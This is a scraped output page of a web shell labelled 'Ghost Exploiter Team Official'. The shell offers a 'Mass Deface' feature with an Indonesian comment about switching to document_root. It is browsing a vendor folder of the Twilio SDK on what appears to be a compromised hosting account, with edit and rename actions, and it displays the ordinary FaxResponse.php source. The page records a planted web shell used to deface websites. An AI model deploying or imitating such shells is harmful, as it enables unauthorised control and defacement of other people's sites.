webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
twilio
/
sdk
/
src
/
Twilio
/
TwiML
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Fax
--
ren
Messaging
--
ren
Video
--
ren
Voice
--
ren
FaxResponse.php
0.569KB
edt
ren
GenericNode.php
0.448KB
edt
ren
MessagingResponse.php
0.986KB
edt
ren
TwiML.php
3.455KB
edt
ren
VoiceResponse.php
5.604KB
edt
ren
<?php /** * This code was generated by * \ / _ _ _| _ _ * | (_)\/(_)(_|\/| |(/_ v1.0.0 * / / */ namespace Twilio\TwiML; class FaxResponse extends TwiML { /** * FaxResponse constructor. */ public function __construct() { parent::__construct('Response', null); } /** * Add Receive child. * * @param array $attributes Optional attributes * @return Fax\Receive Child element. */ public function receive($attributes = []): Fax\Receive { return $this->nest(new Fax\Receive($attributes)); } }